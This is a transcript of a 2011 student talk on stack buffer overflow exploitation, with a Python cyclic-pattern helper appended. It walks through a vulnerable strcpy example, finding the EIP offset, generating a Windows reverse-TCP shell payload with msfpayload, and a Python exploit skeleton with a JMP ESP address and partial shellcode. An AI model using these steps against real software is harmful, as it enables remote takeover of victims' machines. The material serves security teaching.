smash the stack, Menna Essa
twentyCAT event 14/5/2011
Presentation Transcript

    • Smash The Stack! By: @MennaEssa, FCIS student, 2nd year.
    • Agenda: Theory. Steps: 1. Find a bug. 2. Verify the bug. 3. Finalize and use the shell code. View from above: exploit development?
    • What is a buffer? A buffer overflow? Smashing the stack? So the theory is ==>
    • The Theory:

      #include <string.h>

      /* Copies caller-supplied input into a fixed 128-byte stack buffer with no
         length check: the classic stack smash this talk is about. Anything past
         128 bytes overwrites what lies above MyVar on the stack, including the
         saved return address (EIP). */
      void do_something(char *Buffer)
      {
          char MyVar[128];
          strcpy(MyVar, Buffer);
      }

      int main(int argc, char **argv)
      {
          do_something(argv[1]);
      }
    • Step 1: Find the bug. Got the source code? Awesome! No? Reversing (fuzzing): simply, you can keep giving the program inputs of increasing size until it crashes.
    • Step 2: Verify the bug. Where is the EIP? Use a debugger to guide yourself. Use different inputs to limit the range of your expectations. Use unique patterns to find exactly where the overwrite lands: "./pattern_create.rb <size>", then "./pattern_offset.rb <data written in EIP> <size>". You've got the EIP... Sweet!
    • Now what? Now that you have the EIP you should be able to overwrite it with an address where you have your evil <no?> code. We call this the shell code. A shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. Ok... WHERE!
    • Where? Remember when you overwrote your EIP? Why not use the rest of the buffer to put it there, right where the ESP is pointing? EIP ==> ESP. "DMA nope!" Use a jump op from one of the DLLs. Google some resources for that ;)
    • Get the shell code. Now you control the EIP; now where to put your shell code? ./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.112 C
    • Greet the shell code :)

      unsigned char buf[] = "...";   /* the payload bytes, as printed by msfpayload in C format */
    • Finalize:

      #!/usr/bin/env python
      buff = 'A' * 26072
      buff += '\x3a\xf2\xa8\x01'   # EIP overwrite: address of a JMP ESP
      buff += 'CCCC'               # 4 bytes of garbage
      buff += "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30" \
              "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" \
              "\x31\xc0\xac\x3c....."   # your shellcode
      f = open(some_file, 'w')     # however this will be fed to the program as input
      f.write(buff)
      f.close()
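The pattern trick from Step 2, as an added Python example that is not code from the talk or from the Metasploit scripts it names: pattern_create builds the Aa0Aa1... pattern and pattern_offset maps the value the debugger shows in EIP back to the offset in the input, which is how the 26072 on the Finalize slide is found when triaging a crash. The triplet alphabet and little-endian handling follow the pattern_create.rb / pattern_offset.rb convention as assumed here; function names are my own.

```python
import string
import struct

# Added example, not code from the talk or the Metasploit tools it names. The
# triplet alphabet (upper, lower, digit) and the little-endian handling of the
# EIP value follow the pattern_create.rb / pattern_offset.rb convention as
# assumed here.


def pattern_create(length):
    """`length` bytes of the cyclic pattern Aa0Aa1Aa2...Zz9. Every 4-byte
    window is unique within one 20280-byte cycle; after that it repeats."""
    chunks, size = [], 0
    while size < length:
        for upper in string.ascii_uppercase:
            for lower in string.ascii_lowercase:
                for digit in string.digits:
                    chunks.append(upper + lower + digit)
                    size += 3
                    if size >= length:
                        return "".join(chunks)[:length]
    return ""


def pattern_offset(eip_value, length):
    """Map the value the debugger shows in EIP after the crash back to the
    offset(s) in a `length`-byte pattern. Takes the register as an int
    (0x41316141) or as the four characters it spells; [] if no match."""
    if isinstance(eip_value, int):
        # The register loaded its 4 bytes little-endian; undo that to recover
        # the text that sat in the buffer (latin-1 so any byte decodes).
        needle = struct.pack("<I", eip_value).decode("latin-1")
    else:
        needle = eip_value
    pattern = pattern_create(length)
    offsets, start = [], pattern.find(needle)
    while start != -1:
        offsets.append(start)
        start = pattern.find(needle, start + 1)
    return offsets


if __name__ == "__main__":
    # Constructed walk-through: a 100-byte pattern crashed with EIP=0x41316141.
    print(pattern_create(12))               # Aa0Aa1Aa2Aa3
    print(pattern_offset(0x41316141, 100))  # [3]
    # Past one cycle the pattern repeats, so an input as long as the 26072-byte
    # buffer on the Finalize slide can yield two candidate offsets.
    print(pattern_offset("Aa0A", 26080))    # [0, 20280]
```

When the pattern is longer than one cycle, confirm the candidate offset with a second run that places a distinct marker at that offset before trusting it.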
    • Now add it to your code and you're done. Winamp remote buffer overflow exploit, live demo. [This flaw is triggered when an audio file path is specified, inside a playlist, that consists of a UNC path with a long computer name. This module delivers the playlist via the browser.]
    • The look from above... Exploit development: security researchers need to exist more here :) Remember to know how. You can find some neat tutorials on isecurity and corelanc0d3r.
    • ~# Thanks_